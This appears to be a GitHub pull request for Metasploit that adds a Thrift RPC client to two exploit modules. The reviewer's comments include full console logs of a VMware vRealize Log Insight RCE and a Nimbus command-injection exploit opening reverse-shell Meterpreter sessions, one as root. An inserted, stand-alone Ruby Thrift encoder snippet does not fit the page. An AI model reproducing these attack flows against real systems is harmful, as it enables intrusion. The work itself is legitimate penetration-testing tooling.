
Add a Thrift RPC client #18358

Merged: 8 commits, Sep 14, 2023

Conversation

zeroSteiner
Contributor

This adds a new ThriftClient class for interacting with Thrift RPC services. It then updates the two existing Metasploit modules to use it. It also includes additional type definitions, allowing the updated modules to define their data instead of using opaque blobs.

Both exploits were retested to ensure they're still functioning correctly.
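As an added illustration of the typed-message idea behind this PR (this is a stand-alone demo, not the ThriftClient class or the modules it touches), here is a small Ruby encoder and decoder for Thrift's strict binary protocol over the framed transport; the method name, field ids and values used in any test are constructed for the demo, and only i32, string and struct fields are handled.

```ruby
require 'stringio'
module ThriftDemo
  T_STOP, T_I32, T_STRING, T_STRUCT = 0, 8, 11, 12
  MSG_CALL, VERSION_1 = 1, 0x80010000
  # fields: [[id, type, value], ...]; each field is type(i8) id(i16) value, struct ends with T_STOP
  def self.encode_struct(fields)
    fields.map do |id, type, value|
      [type, id].pack('Cn') + case type
                              when T_I32    then [value].pack('l>')
                              when T_STRING then [value.bytesize].pack('N') + value.b
                              when T_STRUCT then encode_struct(value)
                              else raise ArgumentError, "unsupported type #{type}"
                              end
    end.join + [T_STOP].pack('C')
  end
  # CALL message: version|type, method name, seqid, args struct, with a 4-byte frame length in front
  def self.encode_call(method, seqid, args)
    msg = [VERSION_1 | MSG_CALL, method.bytesize].pack('NN') + method.b +
          [seqid].pack('N') + encode_struct(args)
    [msg.bytesize].pack('N') + msg
  end
  # Read exactly n bytes; a truncated frame fails loudly instead of unpacking nil
  def self.take(io, n)
    io.read(n).tap { |d| raise 'truncated message' unless d && d.bytesize == n }
  end
  def self.decode_struct(io)
    fields = []
    while (type = take(io, 1).unpack1('C')) != T_STOP
      id = take(io, 2).unpack1('n')
      fields << [id, type, case type
                           when T_I32    then take(io, 4).unpack1('l>')
                           when T_STRING then take(io, take(io, 4).unpack1('N'))
                           when T_STRUCT then decode_struct(io)
                           else raise "unsupported type #{type}"
                           end]
    end
    fields
  end
  # Parse a framed CALL; rejects bad frame lengths and non-strict headers
  def self.decode_call(frame)
    len = frame.unpack1('N')
    raise 'bad frame length' unless len && frame.bytesize == len + 4
    io = StringIO.new(frame.byteslice(4, len))
    header = take(io, 4).unpack1('N')
    raise 'not strict binary protocol' unless (header & 0xffff0000) == VERSION_1
    method = take(io, take(io, 4).unpack1('N'))
    { type: header & 0xff, method: method, seqid: take(io, 4).unpack1('N'), args: decode_struct(io) }
  end
end
```

`decode_call` is the half a defender would point at a captured frame to recover which method a client invoked and with what typed arguments, rather than treating the payload as an opaque blob.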

Contributor

@adfoster-r7 adfoster-r7 left a comment


Would be good to sprinkle in a few unit tests to help future proof things 🙌

@jheysel-r7 jheysel-r7 self-assigned this Sep 14, 2023
@jheysel-r7
Contributor

Changes look great and testing both modules worked as expected. I'll approve this as is and leave it open for a potential sprinkling of unit tests :)

vmware_vrli_rce

msf6 exploit(linux/http/vmware_vrli_rce) > run

[*] Started reverse TCP handler on 192.168.1.72:4444
[*] 192.168.1.10:443 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.1.10:443 - Checking if 192.168.1.10:443 can be exploited.
[+] 192.168.1.10:443 - The target appears to be vulnerable. VMware XRLI Version: 8.10
[*] 192.168.1.10:443 - Starting Payload Server
[*] 192.168.1.10:443 - Using URL: http://192.168.1.72:8080/StTsERb.tar
[*] 192.168.1.10:443 - Fetching thrift config...
[+] 192.168.1.10:443 - Obtained node token: a2234787-e6d1-4d6a-ad6f-035a4dfdf3fd
[*] 192.168.1.10:443 - Sending getNodeType...
[*] 192.168.1.10:443 - Sending RemotePakDownloadCommand...
[*] 192.168.1.10:443 - Encoding the payload as JSP
[*] 192.168.1.10:443 - Malicious TAR payload created (117760 bytes)
[+] 192.168.1.10:443 - Payload requested by 192.168.1.10:443, sending...
[*] 192.168.1.10:443 - Sending PakUpgradeCommand...
[+] 192.168.1.10:443 - PakUpgrade request is successful
[*] 192.168.1.10:443 - Waiting 2 second for PakUpgrade...
[*] 192.168.1.10:443 - 192.168.1.10:443 - Triggering JSP payload...
[*] Sending stage (3045380 bytes) to 192.168.1.10
[+] 192.168.1.10:443 - Deleted /tmp/StTsERb.pak
[+] 192.168.1.10:443 - Deleted /usr/lib/loginsight/application/3rd_party/apache-tomcat-8.5.82/webapps/ROOT/loginsight/api/api-v5-documentation.jsp
[*] Meterpreter session 1 opened (192.168.1.72:4444 -> 192.168.1.10:50108) at 2023-09-14 12:15:32 -0400
[*] 192.168.1.10:443 - Server stopped.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : node-1w7jr9qrlfdid0mdzfbqbw6mq.ipv6.telus.net
OS           : VMware Photon OS 3.0 (Linux 4.19.256-1.ph3)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit

nimbus_gettopologyhistory_cmd_exec

msf6 exploit(linux/misc/nimbus_gettopologyhistory_cmd_exec) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] 127.0.0.1:6627 - Running automatic check ("set AutoCheck false" to disable)
[+] 127.0.0.1:6627 - The target appears to be vulnerable. Successfully tested command injection.
[*] 127.0.0.1:6627 - Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Sending stage (3045380 bytes) to 172.16.199.1
[*] 127.0.0.1:6627 - Command Stager progress - 100.00% done (823/823 bytes)
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:55473) at 2023-09-14 14:30:16 -0400

meterpreter > getuid
Server username: storm
meterpreter > sysinfo
Computer     : 172.17.0.3
OS           : Debian 11.1 (Linux 6.3.13-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@zeroSteiner zeroSteiner force-pushed the feat/lib/thrift-client branch from a56ef8f to bf9ef45 on September 14, 2023 21:17
@zeroSteiner
Contributor Author

Alright, tests have been added for the data structures. Once they pass, this should be ready to go. Thanks!

@zeroSteiner
Contributor Author

Jenkins test this please

@jheysel-r7 jheysel-r7 merged commit 46832ab into rapid7:master Sep 14, 2023
32 checks passed
@jheysel-r7 jheysel-r7 added the enhancement and rn-enhancement (release notes enhancement) labels Sep 14, 2023
@jheysel-r7
Contributor

Release Notes

This adds a new ThriftClient class for interacting with Thrift RPC services. It also updates the two existing Metasploit modules to use it.
